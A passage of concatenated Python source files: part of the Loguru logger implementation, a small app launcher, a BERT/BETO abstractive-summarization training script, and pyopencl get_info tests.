Returns
-------
``Level``
A |namedtuple| containing information about the level.
Raises
------
ValueError
If there is no level registered with such ``name``.
Examples
--------
>>> level = logger.level("ERROR")
>>> print(level)
Level(name='ERROR', no=40, color='<red><bold>', icon='❌')
>>> logger.add(sys.stderr, format="{level.no} {level.icon} {message}")
1
>>> logger.level("CUSTOM", no=15, color="<blue>", icon="@")
Level(name='CUSTOM', no=15, color='<blue>', icon='@')
>>> logger.log("CUSTOM", "Logging...")
15 @ Logging...
>>> logger.level("WARNING", icon=r"/!\\")
Level(name='WARNING', no=30, color='<yellow><bold>', icon='/!\\\\')
>>> logger.warning("Updated!")
30 /!\\ Updated!
"""
if not isinstance(name, str):
raise TypeError(
"Invalid level name, it should be a string, not: '%s'" % type(name).__name__
)
if no is color is icon is None:
try:
return self._core.levels[name]
except KeyError:
raise ValueError("Level '%s' does not exist" % name) from None
if name not in self._core.levels:
if no is None:
raise ValueError(
"Level '%s' does not exist, you have to create it by specifying a level no"
% name
)
else:
old_color, old_icon = "", " "
elif no is not None:
raise TypeError("Level '%s' already exists, you can't update its severity no" % name)
else:
_, no, old_color, old_icon = self.level(name)
if color is None:
color = old_color
if icon is None:
icon = old_icon
if not isinstance(no, int):
raise TypeError(
"Invalid level no, it should be an integer, not: '%s'" % type(no).__name__
)
if no < 0:
raise ValueError("Invalid level no, it should be a positive integer, not: %d" % no)
ansi = Colorizer.ansify(color)
level = Level(name, no, color, icon)
with self._core.lock:
self._core.levels[name] = level
self._core.levels_ansi_codes[name] = ansi
for handler in self._core.handlers.values():
handler.update_format(name)
return level
def disable(self, name):
"""Disable logging of messages coming from ``name`` module and its children.
Developers of library using `Loguru` should absolutely disable it to avoid disrupting
users with unrelated logs messages.
Note that in some rare circumstances, it is not possible for `Loguru` to
determine the module's ``__name__`` value. In such situation, ``record["name"]`` will be
equal to ``None``, this is why ``None`` is also a valid argument.
Parameters
----------
name : |str| or ``None``
The name of the parent module to disable.
Examples
--------
>>> logger.info("Allowed message by default")
[22:21:55] Allowed message by default
>>> logger.disable("my_library")
>>> logger.info("While publishing a library, don't forget to disable logging")
"""
self._change_activation(name, False)
def enable(self, name):
"""Enable logging of messages coming from ``name`` module and its children.
Logging is generally disabled by imported library using `Loguru`, hence this function
allows users to receive these messages anyway.
To enable all logs regardless of the module they are coming from, an empty string ``""`` can
be passed.
Parameters
----------
name : |str| or ``None``
The name of the parent module to re-allow.
Examples
--------
>>> logger.disable("__main__")
>>> logger.info("Disabled, so nothing is logged.")
>>> logger.enable("__main__")
>>> logger.info("Re-enabled, messages are logged.")
[22:46:12] Re-enabled, messages are logged.
"""
self._change_activation(name, True)
def configure(self, *, handlers=None, levels=None, extra=None, patcher=None, activation=None):
"""Configure the core logger.
It should be noted that ``extra`` values set using this function are available across all
modules, so this is the best way to set overall default values.
Parameters
----------
handlers : |list| of |dict|, optional
A list of each handler to be added. The list should contain dicts of params passed to
the |add| function as keyword arguments. If not ``None``, all previously added
handlers are first removed.
levels : |list| of |dict|, optional
A list of each level to be added or updated. The list should contain dicts of params
passed to the |level| function as keyword arguments. This will never remove previously
created levels.
extra : |dict|, optional
A dict containing additional parameters bound to the core logger, useful to share
common properties if you call |bind| in several of your files modules. If not ``None``,
this will remove previously configured ``extra`` dict.
patcher : |callable|_, optional
A function that will be applied to the record dict of each logged messages across all
modules using the logger. It should modify the dict in-place without returning anything.
The function is executed prior to the one possibly added by the |patch| method. If not
``None``, this will replace previously configured ``patcher`` function.
activation : |list| of |tuple|, optional
A list of ``(name, state)`` tuples which denotes which loggers should be enabled (if
``state`` is ``True``) or disabled (if ``state`` is ``False``). The calls to |enable|
and |disable| are made accordingly to the list order. This will not modify previously
activated loggers, so if you need a fresh start prepend your list with ``("", False)``
or ``("", True)``.
Returns
-------
:class:`list` of :class:`int`
A list containing the identifiers of added sinks (if any).
Examples
--------
>>> logger.configure(
... handlers=[
... dict(sink=sys.stderr, format="[{time}] {message}"),
... dict(sink="file.log", enqueue=True, serialize=True),
... ],
... levels=[dict(name="NEW", no=13, icon="¤", color="")],
... extra={"common_to_all": "default"},
... patcher=lambda record: record["extra"].update(some_value=42),
... activation=[("my_module.secret", False), ("another_library.module", True)],
... )
[1, 2]
>>> # Set a default "extra" dict to logger across all modules, without "bind()"
>>> extra = {"context": "foo"}
>>> logger.configure(extra=extra)
>>> logger.add(sys.stderr, format="{extra[context]} - {message}")
>>> logger.info("Context without bind")
>>> # => "foo - Context without bind"
>>> logger.bind(context="bar").info("Suppress global context")
>>> # => "bar - Suppress global context"
"""
if handlers is not None:
self.remove()
else:
handlers = []
if levels is not None:
for params in levels:
self.level(**params)
if patcher is not None:
with self._core.lock:
self._core.patcher = patcher
if extra is not None:
with self._core.lock:
self._core.extra.clear()
self._core.extra.update(extra)
if activation is not None:
for name, state in activation:
if state:
self.enable(name)
else:
self.disable(name)
return [self.add(**params) for params in handlers]
def _change_activation(self, name, status):
if not (name is None or isinstance(name, str)):
raise TypeError(
"Invalid name, it should be a string (or None), not: '%s'" % type(name).__name__
)
with self._core.lock:
enabled = self._core.enabled.copy()
if name is None:
for n in enabled:
if n is None:
enabled[n] = status
self._core.activation_none = status
self._core.enabled = enabled
return
if name != "":
name += "."
activation_list = [
(n, s) for n, s in self._core.activation_list if n[: len(name)] != name
]
parent_status = next((s for n, s in activation_list if name[: len(n)] == n), None)
if parent_status != status and not (name == "" and status is True):
activation_list.append((name, status))
def modules_depth(x):
return x[0].count(".")
activation_list.sort(key=modules_depth, reverse=True)
for n in enabled:
if n is not None and (n + ".")[: len(name)] == name:
enabled[n] = status
self._core.activation_list = activation_list
self._core.enabled = enabled
@staticmethod
def parse(file, pattern, *, cast={}, chunk=2 ** 16):
"""Parse raw logs and extract each entry as a |dict|.
The logging format has to be specified as the regex ``pattern``, it will then be
used to parse the ``file`` and retrieve each entry based on the named groups present
in the regex.
Parameters
----------
file : |str|, |Path| or |file-like object|_
The path of the log file to be parsed, or an already opened file object.
pattern : |str| or |re.Pattern|_
The regex to use for logs parsing, it should contain named groups which will be included
in the returned dict.
cast : |callable|_ or |dict|, optional
A function that should convert in-place the regex groups parsed (a dict of string
values) to more appropriate types. If a dict is passed, it should be a mapping between
keys of parsed log dict and the function that should be used to convert the associated
value.
chunk : |int|, optional
The number of bytes read while iterating through the logs, this avoids having to load
the whole file in memory.
Yields
------
:class:`dict`
The dict mapping regex named groups to matched values, as returned by |match.groupdict|
and optionally converted according to ``cast`` argument.
Examples
--------
>>> reg = r"(?P<lvl>[0-9]+): (?P<msg>.*)" # If log format is "{level.no} - {message}"
>>> for e in logger.parse("file.log", reg): # A file line could be "10 - A debug message"
... print(e) # => {'lvl': '10', 'msg': 'A debug message'}
>>> caster = dict(lvl=int) # Parse 'lvl' key as an integer
>>> for e in logger.parse("file.log", reg, cast=caster):
... print(e) # => {'lvl': 10, 'msg': 'A debug message'}
>>> def cast(groups):
... if "date" in groups:
... groups["date"] = datetime.strptime(groups["date"], "%Y-%m-%d %H:%M:%S")
...
>>> with open("file.log") as file:
... for log in logger.parse(file, reg, cast=cast):
... print(log["date"], log["something_else"])
"""
if isinstance(file, (str, PathLike)):
should_close = True
fileobj = open(str(file))
elif hasattr(file, "read") and callable(file.read):
should_close = False
fileobj = file
else:
raise TypeError(
"Invalid file, it should be a string path or a file object, not: '%s'"
% type(file).__name__
)
if isinstance(cast, dict):
def cast_function(groups):
for key, converter in cast.items():
if key in groups:
groups[key] = converter(groups[key])
elif callable(cast):
cast_function = cast
else:
raise TypeError(
"Invalid cast, it should be a function or a dict, not: '%s'" % type(cast).__name__
)
try:
regex = re.compile(pattern)
except TypeError:
raise TypeError(
"Invalid pattern, it should be a string or a compiled regex, not: '%s'"
% type(pattern).__name__
) from None
matches = Logger._find_iter(fileobj, regex, chunk)
for match in matches:
groups = match.groupdict()
cast_function(groups)
yield groups
if should_close:
fileobj.close()
@staticmethod
def _find_iter(fileobj, regex, chunk):
buffer = fileobj.read(0)
while 1:
text = fileobj.read(chunk)
buffer += text
matches = list(regex.finditer(buffer))
if not text:
yield from matches
break
if len(matches) > 1:
end = matches[-2].end()
buffer = buffer[end:]
yield from matches[:-1]
def _log(self, level_id, static_level_no, from_decorator, options, message, args, kwargs):
core = self._core
if not core.handlers:
return
(exception, depth, record, lazy, colors, raw, capture, patcher, extra) = options
frame = get_frame(depth + 2)
try:
name = frame.f_globals["__name__"]
except KeyError:
name = None
try:
if not core.enabled[name]:
return
except KeyError:
enabled = core.enabled
if name is None:
status = core.activation_none
enabled[name] = status
if not status:
return
else:
dotted_name = name + "."
for dotted_module_name, status in core.activation_list:
if dotted_name[: len(dotted_module_name)] == dotted_module_name:
if status:
break
enabled[name] = False
return
enabled[name] = True
current_datetime = aware_now()
if level_id is None:
level_icon = " "
level_no = static_level_no
level_name = "Level %d" % level_no
else:
try:
level_name, level_no, _, level_icon = core.levels[level_id]
except KeyError:
raise ValueError("Level '%s' does not exist" % level_id) from None
if level_no < core.min_level:
return
code = frame.f_code
file_path = code.co_filename
file_name = basename(file_path)
thread = current_thread()
process = current_process()
elapsed = current_datetime - start_time
if exception:
if isinstance(exception, BaseException):
type_, value, traceback = (type(exception), exception, exception.__traceback__)
elif isinstance(exception, tuple):
type_, value, traceback = exception
else:
type_, value, traceback = sys.exc_info()
exception = RecordException(type_, value, traceback)
else:
exception = None
log_record = {
"elapsed": elapsed,
"exception": exception,
"extra": {**core.extra, **context.get(), **extra},
"file": RecordFile(file_name, file_path),
"function": code.co_name,
"level": RecordLevel(level_name, level_no, level_icon),
"line": frame.f_lineno,
"message": message,
"module": splitext(file_name)[0],
"name": name,
"process": RecordProcess(process.ident, process.name),
"thread": RecordThread(thread.ident, thread.name),
"time": current_datetime,
}
if lazy:
args = [arg() for arg in args]
kwargs = {key: value() for key, value in kwargs.items()}
if capture and kwargs:
log_record["extra"].update(kwargs)
if record:
if "record" in kwargs:
raise TypeError(
"The message can't be formatted: 'record' shall not be used as a keyword "
"argument while logger has been configured with '.opt(record=True)'"
)
kwargs.update(record=log_record)
if colors:
if args or kwargs:
colored_message = Colorizer.prepare_message(message, args, kwargs)
else:
colored_message = Colorizer.prepare_simple_message(message)
log_record["message"] = colored_message.stripped
elif args or kwargs:
colored_message = None
log_record["message"] = message.format(*args, **kwargs)
else:
colored_message = None
if core.patcher:
core.patcher(log_record)
if patcher:
patcher(log_record)
for handler in core.handlers.values():
handler.emit(log_record, level_id, from_decorator, raw, colored_message)
def trace(__self, __message, *args, **kwargs):
r"""Log ``message.format(*args, **kwargs)`` with severity ``'TRACE'``."""
__self._log("TRACE", None, False, __self._options, __message, args, kwargs)
def debug(__self, __message, *args, **kwargs):
r"""Log ``message.format(*args, **kwargs)`` with severity ``'DEBUG'``."""
__self._log("DEBUG", None, False, __self._options, __message, args, kwargs)
def info(__self, __message, *args, **kwargs):
r"""Log ``message.format(*args, **kwargs)`` with severity ``'INFO'``."""
__self._log("INFO", None, False, __self._options, __message, args, kwargs)
def success(__self, __message, *args, **kwargs):
r"""Log ``message.format(*args, **kwargs)`` with severity ``'SUCCESS'``."""
__self._log("SUCCESS", None, False, __self._options, __message, args, kwargs)
def warning(__self, __message, *args, **kwargs):
r"""Log ``message.format(*args, **kwargs)`` with severity ``'WARNING'``."""
__self._log("WARNING", None, False, __self._options, __message, args, kwargs)
def error(__self, __message, *args, **kwargs):
r"""Log ``message.format(*args, **kwargs)`` with severity ``'ERROR'``."""
__self._log("ERROR", None, False, __self._options, __message, args, kwargs)
def critical(__self, __message, *args, **kwargs):
r"""Log ``message.format(*args, **kwargs)`` with severity ``'CRITICAL'``."""
__self._log("CRITICAL", None, False, __self._options, __message, args, kwargs)
def exception(__self, __message, *args, **kwargs):
r"""Convenience method for logging an ``'ERROR'`` with exception information."""
options = (True,) + __self._options[1:]
__self._log("ERROR", None, False, options, __message, args, kwargs)
def log(__self, __level, __message, *args, **kwargs):
r"""Log ``message.format(*args, **kwargs)`` with severity ``level``."""
level_id, static_level_no = __self._dynamic_level(__level)
__self._log(level_id, static_level_no, False, __self._options, __message, args, kwargs)
@staticmethod
@functools.lru_cache(maxsize=32)
def _dynamic_level(level):
if isinstance(level, str):
return (level, None)
if isinstance(level, int):
if level < 0:
raise ValueError(
"Invalid level value, it should be a positive integer, not: %d" % level
)
return (None, level)
raise TypeError(
"Invalid level, it should be an integer or a string, not: '%s'" % type(level).__name__
)
def start(self, *args, **kwargs):
"""Deprecated function to |add| a new handler.
Warnings
--------
.. deprecated:: 0.2.2
``start()`` will be removed in Loguru 1.0.0, it is replaced by ``add()`` which is a less
confusing name.
"""
warnings.warn(
"The 'start()' method is deprecated, please use 'add()' instead", DeprecationWarning
)
return self.add(*args, **kwargs)
def stop(self, *args, **kwargs):
"""Deprecated function to |remove| an existing handler.
Warnings
--------
.. deprecated:: 0.2.2
``stop()`` will be removed in Loguru 1.0.0, it is replaced by ``remove()`` which is a less
confusing name.
"""
warnings.warn(
"The 'stop()' method is deprecated, please use 'remove()' instead", DeprecationWarning
)
return self.remove(*args, **kwargs)
|
app.py
|
#!/bin/python3
import threading
import msg_handler
import http_interface
msgThread = threading.Thread(target=lambda: msg_handler.mainLoop())
msgThread.daemon = True
msgThread.start()
http_interface.app.run(host='localhost', port=8080)
|
train_abstractive.py
|
#!/usr/bin/env python
"""
Main training workflow
"""
from __future__ import division
import argparse
import glob
import os
import random
import signal
import time
import torch
from pytorch_transformers import BertTokenizer
import distributed
from models import data_loader, model_builder
from models.data_loader import load_dataset
from models.loss import abs_loss
from models.model_builder import AbsSummarizer
from models.predictor import build_predictor
from models.trainer import build_trainer
from others.logging import logger, init_logger
model_flags = ['hidden_size', 'ff_size', 'heads', 'emb_size', 'enc_layers', 'enc_hidden_size', 'enc_ff_size',
'dec_layers', 'dec_hidden_size', 'dec_ff_size', 'encoder', 'ff_actv', 'use_interval']
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def train_abs_multi(args):
""" Spawns 1 process per GPU """
init_logger()
nb_gpu = args.world_size
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for i in range(nb_gpu):
device_id = i
procs.append(mp.Process(target=run, args=(args,
device_id, error_queue,), daemon=True))
procs[i].start()
logger.info(" Starting process pid: %d " % procs[i].pid)
error_handler.add_child(procs[i].pid)
for p in procs:
p.join()
def run(args, device_id, error_queue):
""" run process """
setattr(args, 'gpu_ranks', [int(i) for i in args.gpu_ranks])
try:
gpu_rank = distributed.multi_init(device_id, args.world_size, args.gpu_ranks)
print('gpu_rank %d' % gpu_rank)
if gpu_rank != args.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
train_abs_single(args, device_id)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((args.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
def validate_abs(args, device_id):
timestep = 0
if (args.test_all):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
xent_lst = []
for i, cp in enumerate(cp_files):
step = int(cp.split('.')[-2].split('_')[-1])
if (args.test_start_from != -1 and step < args.test_start_from):
xent_lst.append((1e6, cp))
continue
xent = validate(args, device_id, cp, step)
xent_lst.append((xent, cp))
max_step = xent_lst.index(min(xent_lst))
if (i - max_step > 10):
break
xent_lst = sorted(xent_lst, key=lambda x: x[0])[:5]
logger.info('PPL %s' % str(xent_lst))
for xent, cp in xent_lst:
step = int(cp.split('.')[-2].split('_')[-1])
test_abs(args, device_id, cp, step)
else:
while (True):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (not os.path.getsize(cp) > 0):
time.sleep(60)
continue
if (time_of_cp > timestep):
timestep = time_of_cp
step = int(cp.split('.')[-2].split('_')[-1])
validate(args, device_id, cp, step)
test_abs(args, device_id, cp, step)
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (time_of_cp > timestep):
continue
else:
time.sleep(300)
def validate(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = AbsSummarizer(args, device, checkpoint)
model.eval()
valid_iter = data_loader.Dataloader(args, load_dataset(args, 'valid', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=False)
if args.cased:
tokenizer = BertTokenizer.from_pretrained('BETO/', cache_dir=args.temp_dir)
else:
tokenizer = BertTokenizer.from_pretrained('BETO/', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
valid_loss = abs_loss(model.generator, symbols, model.vocab_size, train=False, device=device)
trainer = build_trainer(args, device_id, model, None, valid_loss)
stats = trainer.validate(valid_iter, step)
return stats.xent()
def test_abs(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = AbsSummarizer(args, device, checkpoint)
model.eval()
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.test_batch_size, device,
shuffle=False, is_test=True)
if args.cased:
tokenizer = BertTokenizer.from_pretrained('BETO/', cache_dir=args.temp_dir)
else:
tokenizer = BertTokenizer.from_pretrained('BETO/', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
predictor = build_predictor(args, tokenizer, symbols, model, logger)
predictor.translate(test_iter, step)
def test_text_abs(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if pt != '':
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if k in model_flags:
setattr(args, k, opt[k])
print(args)
model = AbsSummarizer(args, device, checkpoint)
model.eval()
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.test_batch_size, device,
shuffle=False, is_test=True)
if args.cased:
tokenizer = BertTokenizer.from_pretrained('BETO/', cache_dir=args.temp_dir)
else:
tokenizer = BertTokenizer.from_pretrained('BETO/', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
predictor = build_predictor(args, tokenizer, symbols, model, logger)
predictor.translate(test_iter, step)
def baseline(args, cal_lead=False, cal_oracle=False):
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.batch_size, 'cpu',
shuffle=False, is_test=True)
trainer = build_trainer(args, '-1', None, None, None)
#
if cal_lead:
trainer.test(test_iter, 0, cal_lead=True)
elif cal_oracle:
trainer.test(test_iter, 0, cal_oracle=True)
def train_abs(args, device_id):
if (args.world_size > 1):
train_abs_multi(args)
else:
train_abs_single(args, device_id)
def train_abs_single(args, device_id):
init_logger(args.log_file)
logger.info(str(args))
device = "cpu" if args.visible_gpus == '-1' else "cuda"
logger.info('Device ID %d' % device_id)
logger.info('Device %s' % device)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
if device_id >= 0:
torch.cuda.set_device(device_id)
torch.cuda.manual_seed(args.seed)
if args.train_from != '':
logger.info('Loading checkpoint from %s' % args.train_from)
checkpoint = torch.load(args.train_from,
map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
else:
checkpoint = None
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
def train_iter_fct():
return data_loader.Dataloader(args, load_dataset(args, 'train', shuffle=True), args.batch_size, device,
shuffle=True, is_test=False)
model = AbsSummarizer(args, device, checkpoint)
if (args.sep_optim):
optim_bert = model_builder.build_optim_bert(args, model, checkpoint)
optim_dec = model_builder.build_optim_dec(args, model, checkpoint)
optim = [optim_bert, optim_dec]
else:
optim = [model_builder.build_optim(args, model, checkpoint)]
logger.info(model)
if args.cased:
tokenizer = BertTokenizer.from_pretrained('BETO/', cache_dir=args.temp_dir)
else:
tokenizer = BertTokenizer.from_pretrained('BETO/', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
train_loss = abs_loss(model.generator, symbols, model.vocab_size, device, train=True,
label_smoothing=args.label_smoothing)
trainer = build_trainer(args, device_id, model, optim, train_loss)
trainer.train(train_iter_fct, args.train_steps)
|
test_wrapper.py
|
from __future__ import division, absolute_import, print_function
__copyright__ = "Copyright (C) 2009 Andreas Kloeckner"
__license__ = """
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from six.moves import range
import numpy as np
import numpy.linalg as la
import pytest
import pyopencl as cl
import pyopencl.array as cl_array
import pyopencl.clrandom
from pyopencl.tools import ( # noqa
pytest_generate_tests_for_pyopencl as pytest_generate_tests)
# Are CL implementations crashy? You be the judge. :)
try:
import faulthandler # noqa
except ImportError:
pass
else:
faulthandler.enable()
def _skip_if_pocl(plat, msg='unsupported by pocl'):
if plat.vendor == "The pocl project":
import pytest
pytest.skip(msg)
def test_get_info(ctx_factory):
ctx = ctx_factory()
device, = ctx.devices
platform = device.platform
failure_count = [0]
pocl_quirks = [
(cl.Buffer, cl.mem_info.OFFSET),
(cl.Program, cl.program_info.BINARIES),
(cl.Program, cl.program_info.BINARY_SIZES),
]
if ctx._get_cl_version() >= (1, 2) and cl.get_cl_header_version() >= (1, 2):
pocl_quirks.extend([
(cl.Program, cl.program_info.KERNEL_NAMES),
(cl.Program, cl.program_info.NUM_KERNELS),
])
CRASH_QUIRKS = [ # noqa
(("NVIDIA Corporation", "NVIDIA CUDA",
"OpenCL 1.0 CUDA 3.0.1"),
[
(cl.Event, cl.event_info.COMMAND_QUEUE),
]),
(("NVIDIA Corporation", "NVIDIA CUDA",
"OpenCL 1.2 CUDA 7.5"),
[
(cl.Buffer, getattr(cl.mem_info, "USES_SVM_POINTER", None)),
]),
(("The pocl project", "Portable Computing Language",
"OpenCL 1.2 pocl 0.8-pre"),
pocl_quirks),
(("The pocl project", "Portable Computing Language",
"OpenCL 1.2 pocl 0.8"),
pocl_quirks),
(("The pocl project", "Portable Computing Language",
"OpenCL 1.2 pocl 0.9-pre"),
pocl_quirks),
(("The pocl project", "Portable Computing Language",
"OpenCL 1.2 pocl 0.9"),
pocl_quirks),
(("The pocl project", "Portable Computing Language",
"OpenCL 1.2 pocl 0.10-pre"),
pocl_quirks),
(("The pocl project", "Portable Computing Language",
"OpenCL 1.2 pocl 0.10"),
pocl_quirks),
(("Apple", "Apple",
"OpenCL 1.2"),
[
(cl.Program, cl.program_info.SOURCE),
]),
]
QUIRKS = [] # noqa
def find_quirk(quirk_list, cl_obj, info):
for (vendor, name, version), quirks in quirk_list:
if (
vendor == platform.vendor
and name == platform.name
and platform.version.startswith(version)):
for quirk_cls, quirk_info in quirks:
if (isinstance(cl_obj, quirk_cls)
and quirk_info == info):
return True
return False
def do_test(cl_obj, info_cls, func=None, try_attr_form=True):
if func is None:
def func(info):
cl_obj.get_info(info)
for info_name in dir(info_cls):
if not info_name.startswith("_") and info_name != "to_string":
print(info_cls, info_name)
info = getattr(info_cls, info_name)
if find_quirk(CRASH_QUIRKS, cl_obj, info):
print("not executing get_info", type(cl_obj), info_name)
print("(known crash quirk for %s)" % platform.name)
continue
try:
func(info)
except:
msg = "failed get_info", type(cl_obj), info_name
if find_quirk(QUIRKS, cl_obj, info):
msg += ("(known quirk for %s)" % platform.name)
else:
failure_count[0] += 1
if try_attr_form:
try:
getattr(cl_obj, info_name.lower())
except:
print("failed attr-based get_info", type(cl_obj), info_name)
if find_quirk(QUIRKS, cl_obj, info):
print("(known quirk for %s)" % platform.name)
else:
failure_count[0] += 1
do_test(platform, cl.platform_info)
do_test(device, cl.device_info)
do_test(ctx, cl.context_info)
props = 0
if (device.queue_properties
& cl.command_queue_properties.PROFILING_ENABLE):
profiling = True
props = cl.command_queue_properties.PROFILING_ENABLE
queue = cl.CommandQueue(ctx,
properties=props)
do_test(queue, cl.command_queue_info)
prg = cl.Program(ctx, """
__kernel void sum(__global float *a)
{ a[get_global_id(0)] *= 2; }
""").build()
do_test(prg, cl.program_info)
do_test(prg, cl.program_build_info,
lambda info: prg.get_build_info(device, info),
try_attr_form=False)
n = 2000
a_buf = cl.Buffer(ctx, 0, n*4)
do_test(a_buf, cl.mem_info)
kernel = prg.sum
do_test(kernel, cl.kernel_info)
evt = kernel(queue, (n,), None, a_buf)
do_test(evt, cl.event_info)
if profiling:
evt.wait()
do_test(evt, cl.profiling_info,
lambda info: evt.get_profiling_info(info),
try_attr_form=False)
# crashes on intel...
# and pocl does not support CL_ADDRESS_CLAMP
if device.image_support and platform.vendor not in [
"Intel(R) Corporation",
"The pocl project",
]:
smp = cl.Sampler(ctx, False,
cl.addressing_mode.CLAMP,
cl.filter_mode.NEAREST)
do_test(smp, cl.sampler_info)
img_format = cl.get_supported_image_formats(
ctx, cl.mem_flags.READ_ONLY, cl.mem_object_type.IMAGE2D)[0]
img = cl.Image(ctx, cl.mem_flags.READ_ONLY, img_format, (128, 256))
assert img.shape == (128, 256)
img.depth
img.image.depth
do_test(img, cl.image_info,
lambda info: img.get_image_info(info))
def test_int_ptr(ctx_factory):
def do_test(obj):
new_obj = type(obj).from_int_ptr(obj.int_ptr)
assert obj == new_obj
assert type(obj) is type(new_obj)
ctx = ctx_factory()
device, = ctx.devices
platform = device.platform
do_test(device)
do_test(platform)
do_test(ctx)
queue = cl.CommandQueue(ctx)
do_test(queue)
evt = cl.enqueue_marker(queue)
do_test(evt)
prg = cl.Program(ctx, """
__kernel void sum(__global float *a)
{ a[get_global_id(0)] *= 2; }
""").build()
do_test(prg)
do_test(prg.sum)
n = 2000
a_buf = cl.Buffer(ctx, 0, n*4)
do_test(a_buf)
# crashes on intel...
# and pocl does not support CL_ADDRESS_CLAMP
if device.image_support and platform.vendor not in [
"Intel(R) Corporation",
"The pocl project",
]:
smp = cl.Sampler(ctx, False,
cl.addressing_mode.CLAMP,
cl.filter_mode.NEAREST)
do_test(smp)
img_format = cl.get_supported_image_formats(
ctx, cl.mem_flags.READ_ONLY, cl.mem_object_type.IMAGE2D)[0]
img = cl.Image(ctx, cl.mem_flags.READ_ONLY, img_format, (128, 256))
do_test(img)
def test_invalid_kernel_names_cause_failures(ctx_factory):
ctx = ctx_factory()
device = ctx.devices[0]
prg = cl.Program(ctx, """
__kernel void sum(__global float *a)
{ a[get_global_id(0)] *= 2; }
""").build()
try:
prg.sam
